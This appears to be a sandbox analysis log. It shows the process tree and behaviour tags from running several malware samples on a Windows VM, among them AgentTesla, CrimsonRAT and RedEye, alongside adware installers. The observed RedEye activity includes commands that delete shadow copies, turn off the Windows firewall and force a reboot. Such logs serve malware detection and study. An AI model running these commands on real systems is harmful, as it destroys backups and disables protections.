C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7024 /prefetch:82⤵PID:628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:12⤵PID:4172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:12⤵PID:712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:12⤵PID:1364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:12⤵PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2816 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:12⤵PID:556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8028 /prefetch:82⤵PID:408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5088
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\is-TVQIS.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-TVQIS.tmp\butterflyondesktop.tmp" /SL5="$E0046,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3780
-
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2456 -
C:\Users\Admin\AppData\Local\Temp\is-03UJG.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-03UJG.tmp\butterflyondesktop.tmp" /SL5="$40218,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1796
-
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\is-SG6AK.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-SG6AK.tmp\butterflyondesktop.tmp" /SL5="$30208,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4484 -
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:5084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html4⤵PID:3368
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9bce46f8,0x7ffd9bce4708,0x7ffd9bce47185⤵PID:2428
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:12⤵PID:232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:12⤵PID:4608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:12⤵PID:3360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8288 /prefetch:12⤵PID:3712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8428 /prefetch:12⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7932 /prefetch:12⤵PID:3792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8548 /prefetch:12⤵PID:4632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:12⤵PID:1520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8016 /prefetch:12⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7820 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7824 /prefetch:82⤵PID:3292
-
-
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\Wave\SWUpdaterSetup.exe"C:\Users\Admin\AppData\Local\Temp\Wave\SWUpdaterSetup.exe" /install "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3216 -
C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdater.exe"C:\Program Files (x86)\Wavesor\Temp\GUM61A9.tmp\SWUpdater.exe" /install "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868 -
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5160 -
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:5188
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:5212
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.133.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:5232
-
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJTV1VwZGF0ZXIiIHVwZGF0ZXJ2ZXJzaW9uPSIxLjMuMTMzLjAiIHNoZWxsX3ZlcnNpb249IjEuMy4xMzMuMCIgaXNtYWNoaW5lPSIwIiBzZXNzaW9uaWQ9IntGMTMyMUQwQi1GMTUxLTQyOUQtODlBRS03NTBFRTk1RkQyNjV9IiB1c2VyaWQ9InthZmRjZDA4Yy0zOGQ1LTQ4YzMtOGYxYS0yYjcyNGNhM2U0MTB9IiBpbnN0YWxsc291cmNlPSJvdGhlcmluc3RhbGxjbWQiIHJlcXVlc3RpZD0iezlCOUUxQUQ1LTQ2RUMtNDI2QS04QzgxLUI1RDVGMjI4NjBFOH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7RjZGNjBBQ0UtNzFBRC00NjEwLTgwRDQtOTI1MzcyOUZCNEI3fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjEzMy4wIiBsYW5nPSJlbiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMjA1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5304
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /handoff "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1" /installsource otherinstallcmd /sessionid "{F1321D0B-F151-429D-89AE-750EE95FD265}"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:5348
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:12⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6492 /prefetch:82⤵PID:5548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:12⤵PID:6964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6520
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"2⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6608
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"2⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:7736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8204 /prefetch:12⤵PID:1280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:12⤵PID:7780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8176 /prefetch:82⤵PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8764 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6596
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
PID:3624 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Adds Run key to start application
PID:6340
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵PID:3300
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
PID:5932 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵PID:7680
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
PID:6308 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵PID:6472
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:12⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8424 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8232 /prefetch:82⤵PID:7436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1716 /prefetch:12⤵PID:7416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5332 /prefetch:82⤵PID:212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,6877624187250882113,5522335564882071549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8420 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:7808
-
-
C:\Users\Admin\Downloads\RedEye.exe"C:\Users\Admin\Downloads\RedEye.exe"2⤵
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
PID:3032
-
-
C:\Users\Admin\Downloads\RedEye.exe"C:\Users\Admin\Downloads\RedEye.exe"2⤵PID:816
-
-
C:\Users\Admin\Downloads\RedEye.exe"C:\Users\Admin\Downloads\RedEye.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Disables RegEdit via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops autorun.inf file
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:6284 -
C:\Windows\SYSTEM32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:540
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3056
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6068
-
-
C:\Windows\SYSTEM32\NetSh.exeNetSh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5896
-
-
C:\Windows\System32\shutdown.exe"C:\Windows\System32\shutdown.exe" -r -t 00 -f3⤵PID:4032
-
-
-
C:\Users\Admin\Downloads\RedEye.exe"C:\Users\Admin\Downloads\RedEye.exe"2⤵PID:6212
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1304
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 712 -ip 7121⤵PID:5052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4532 -ip 45321⤵PID:800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2216 -ip 22161⤵PID:3488
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4896
-
C:\Users\Admin\Downloads\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4504 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 11722⤵
- Program crash
PID:428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4504 -ip 45041⤵PID:5080
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3a4 0x2d01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" -Embedding1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:5404 -
C:\Users\Admin\Wavesor Software\SWUpdater\Install\{480227C2-19ED-43C9-A26E-D7C3AA146748}\WaveInstaller-v1.5.18.2.exe"C:\Users\Admin\Wavesor Software\SWUpdater\Install\{480227C2-19ED-43C9-A26E-D7C3AA146748}\WaveInstaller-v1.5.18.2.exe" /installerdata="C:\Users\Admin\AppData\Local\Temp\guiA28B.tmp"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\nseA52B.tmp\wavebrowser.packed.7z" --wid=z51trq3s --installerdata="C:\Users\Admin\AppData\Local\Temp\guiA28B.tmp"3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:5828 -
